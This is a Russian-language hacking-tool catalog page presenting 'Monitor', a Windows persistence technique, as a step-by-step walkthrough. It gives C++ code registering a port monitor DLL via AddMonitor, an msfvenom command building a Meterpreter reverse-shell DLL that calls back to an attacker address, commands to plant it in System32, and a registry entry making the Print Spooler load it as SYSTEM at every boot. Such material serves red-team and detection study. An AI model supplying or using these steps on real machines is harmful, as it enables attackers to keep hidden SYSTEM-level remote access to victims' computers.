Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Monitor — A old way to Persistence | Kitploit
Инструменты/GitHubGitHub/al1ex/monitor
Privilege EscalationPayload GenerationPersistence MechanismsExploitationPost-ExploitationCommand and ControlRed Teaming
GitHubal1ex/monitor

Monitor

A old way to Persistence

Репозиторий
53105 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Описание проекта

Используется для поддержания привилегий на этапе пост-эксплуатации

Использование проекта

Шаг 1: Скачайте проект, затем скомпилируйте Monitor.cpp с помощью VS. Можно также использовать уже скомпилированный файл. Код Monitor.cpp приведён ниже:

root@kitploit:~
#include "Windows.h"

int main() {
	MONITOR_INFO_2 monitorInfo;
	TCHAR env[12] = TEXT("Windows x64");
	TCHAR name[12] = TEXT("Monitor");
	TCHAR dll[12] = TEXT("test.dll");
	monitorInfo.pName = name;
	monitorInfo.pEnvironment = env;
	monitorInfo.pDLLName = dll;
	AddMonitor(NULL, 2, (LPBYTE)&monitorInfo);
	return 0;
}
  • pName // имя монитора
  • pEnvironment // архитектура окружения
  • pDLLName // имя DLL-файла монитора

Шаг 2: Сгенерируйте DLL-полезную нагрузку с помощью Msfvenom:

root@kitploit:~
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.188.129 LPORT=4444 -f dll > shell.dll

test_dll

Шаг 3: Скопируйте shell.dll в каталог system32 целевого хоста, затем переименуйте его в test.dll (то есть в PDLLName из примера выше; вы можете изменить его на своё усмотрение — как угодно)

root@kitploit:~
copy C:\temp\shell.dll C:\Windows\System32\test.dll

copy

Шаг 4: Затем перейдите в каталог system32 и выполните следующую команду (Monitors.exe — это ранее скомпилированный файл, его также необходимо разместить в каталоге system32):

root@kitploit:~
Monitors.exe

Monitor

Шаг 5: После этого успешно устанавливается сессия Meterpreter

Meterpreter

Реализация персистентности

Для обеспечения персистентности необходимо создать ключ в разделе реестра "Monitors":

root@kitploit:~
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors

Затем выполните в командной строке следующую команду для создания записи реестра, которая будет содержать значение test.dll. Проверьте в редакторе реестра, что ключ был создан:

root@kitploit:~
reg add "hklm\system\currentcontrolset\control\print\monitors\Pentestlab" /v "Driver" /d "test.dll" /t REG_SZ

regedit

При следующей перезагрузке процесс spoolsv.exe загрузит все DLL-файлы драйверов, которые существуют в разделе реестра Monitors и хранятся в папке System32 папки Windows. На рисунке ниже показано, что сессия Meterpreter установлена с тем же уровнем привилегий, что и служба Print Spooler (SYSTEM), и была запущена из папки System32

shell

Скачать инструмент